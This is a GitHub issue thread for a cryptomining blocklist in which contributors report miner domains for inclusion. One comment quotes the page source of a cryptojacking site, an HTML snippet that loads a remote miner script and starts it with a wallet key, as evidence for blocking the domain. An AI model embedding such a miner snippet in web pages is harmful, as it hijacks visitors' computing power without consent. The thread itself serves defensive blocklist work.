### ISSUE TITLE
Updates for your list

### ISSUE THREAD

**Issue by ZeroDot1** [hoshsadiq/adblock-nocoin-list#129]
I think it's good to share information.
https://github.com/ZeroDot1/CoinBlockerLists/issues/102
https://github.com/ZeroDot1/CoinBlockerLists/issues/101
Please look for what is missing in your list and add it.

**Comment by hoshsadiq** [comment]
Thanks! Leaving this open for future referencing.

**Comment by ZeroDot1** [comment]
@hoshsadiq 
https://github.com/ZeroDot1/CoinBlockerLists/issues/104
Please check also the link of VirusTotal. 
https://www.virustotal.com/de/ip-address/104.18.47.158/information/

**Comment by iTaskmanager** [comment]
TLD "datasecu.download" is missing.

Check: `view-source:https://www.datasecu.download/lot.html`

`<html> <head></head> <body> <script src="https://www.datasecu.download/mb64.js"></script> <script> var eggplant = Gurke.Anonymous('489djE22mdZ3j34vhES98tCzfVn57Wq4fA8JR6uzgHqYCfYE2nmaZxmjepwr3GQAZd3qc3imFyGPHBy4PBWLb4tc1X8ADsu',{throttle: 0.4}); eggplant.start(); </script> </body> </html>`

**Comment by SMed79** [comment]
@iTaskmanager Don't post anywhere, open new issue for new site.

**Comment by ZeroDot1** [comment]
https://github.com/ZeroDot1/CoinBlockerLists/commit/8a86fa28fb74af0b348b1e7e987fbb707904d327

**Comment by dmitriwhy** [comment]
Hey I'm new to this; my apologies if I don't do this correctly..
I just love that you are doing this and wanted to share that coinhive is still getting through somehow:
![screenshot of malwarebytes](https://user-images.githubusercontent.com/38705756/39215993-9f223610-47df-11e8-89af-b903e9fc1865.png)

**Comment by SMed79** [comment]
@dmitriwhy example site?

**Comment by hoshsadiq** [comment]
Locking this conversation now since people don't seem to want to open a new issue. @SMed79 @dmitriwhy see #214
